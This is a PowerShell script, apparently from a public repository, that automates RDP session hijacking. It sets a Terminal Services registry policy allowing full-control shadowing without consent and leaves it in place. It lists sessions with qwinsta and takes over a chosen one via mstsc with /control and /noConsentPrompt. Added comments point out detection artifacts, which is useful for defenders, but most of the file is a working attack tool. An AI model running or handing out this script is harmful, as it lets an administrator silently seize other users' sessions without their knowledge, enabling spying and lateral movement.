# Start-RdpSessionTakeover.ps1
# Originally written by Pyrrh1c 2/22/2021
<#
.Synopsis
This script automates the process of enumerating existing RDP sessions and allows the user to then take over a selected session.
.Description
A short script to automate the process of RDP session hijacking. When run without any parameters it will enumerate all existing RDP sessions and prompt for a session to be taken over. This script requires local admin to run.
.Parameter UserName
If you already know the username of the session you want to take over you can specify it and skip enumeration.
.Example
Start-RdpSessionTakeover.ps1
The default behavior. Enumerates all existing RDP sessions, lists them, prompts for which to take over, then takes over the chosen session.
.Example
Start-RdpSessionTakeover.ps1 -UserName jdoe
Takes over the session for user jdoe without enumerating all sessions.
.Link
http://github.com/pyrrh1c/Start-RdpSessionTakeover
.Link
http://pyrrh1c.net
.Notes
This script is under active development, stay tuned.
#>
# Defining the parameters for the script to run.
# $UserName is optional; when it is empty the script falls into the interactive enumeration branch below.
Param(
[CmdletBinding(DefaultParameterSetName='UserName')]
[Parameter()]
[String]
$UserName
)
#Requires -RunAsAdministrator
Write-Host "Enabling RDP Shadowing" -ForegroundColor Yellow
# Policy key for Terminal Services. The double assignment is a no-op; the path is simply stored in $RegPath.
$RegPath = $RegPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services"
$Name = "Shadow"
$Value = 2
# Writes Shadow=2 (DWORD) under the HKLM policy key; -Force creates or overwrites the value.
# Nothing later in this script removes or restores it, so the policy change persists after the script ends.
# For defenders: a registry set-value event on this key/value name is a durable, auditable artifact of this activity.
# Value 2 corresponds to the "full control without user's permission" shadow policy per Microsoft's documentation — confirm against the current policy reference.
New-ItemProperty -Path $RegPath -Name $Name -Value $value -PropertyTYpe DWORD -Force
Clear-Host
# Branch 1: no -UserName given -> enumerate sessions and prompt interactively.
if ($UserName -eq "")
{
Clear-Host
# $ComputerName is never assigned anywhere in this script, so /server: is passed with an empty value.
# qwinsta's whitespace-aligned output is collapsed to commas and parsed as CSV, then rows whose
# SESSIONNAME contains 'services' or ends in 'rdp-tcp', or whose USERNAME is like '1', are dropped.
# Detection note: powershell.exe spawning qwinsta.exe followed by mstsc.exe is the observable process chain here.
$Sessions = C:\Windows\System32\qwinsta.exe /server:$ComputerName |
ForEach-Object {
$_.Trim() -replace "\s+",","
} |
ConvertFrom-Csv | ?{($_.SESSIONNAME -notlike '*services*') -And ($_.SESSIONNAME -notlike '*rdp-tcp') -And ($_.USERNAME -notlike '1')}
Write-Host "Current RDP Sessions" -ForegroundColor Yellow
Write-Host "===================="
$i=0
# Prints a zero-based index next to each remaining USERNAME; $i is incremented after each line.
$Sessions | ForEach-Object{Write-Host $i": " $_.USERNAME; $i++}
Write-Host "===================="
# The raw Read-Host string is used directly as an array index below; no range or numeric validation is performed.
$selection = Read-Host "Enter the number of the session to hijack"
Clear-Host
Write-Host "Connecting to Session" ($Sessions[$selection]).USERNAME -ForegroundColor Yellow
# Shadows the chosen session ID on localhost with /control and /noConsentPrompt (relies on the Shadow policy written above).
# Detection note: mstsc.exe launched with /shadow and /noConsentPrompt on its command line is a high-signal indicator.
mstsc /v:localhost /shadow:($Sessions[$selection]).ID /control /noConsentPrompt
}
# Branch 2: -UserName given -> skip the prompt and shadow the first matching session.
else
{
# Same qwinsta parsing as above, filtered with -like against the caller-supplied $UserName
# (wildcard characters in $UserName are interpreted as a pattern, not matched literally).
$Sessions = C:\Windows\System32\qwinsta.exe /server:$ComputerName |
ForEach-Object {
$_.Trim() -replace "\s+",","
} |
ConvertFrom-Csv | ?{$_.USERNAME -like $UserName}
Clear-Host
Write-Host "Taking over session for" $UserName -ForegroundColor Yellow
# Uses the first match only; there is no check that $Sessions contains any element before indexing [0].
mstsc /v:localhost /shadow:($Sessions[0]).ID /control /noConsentPrompt
}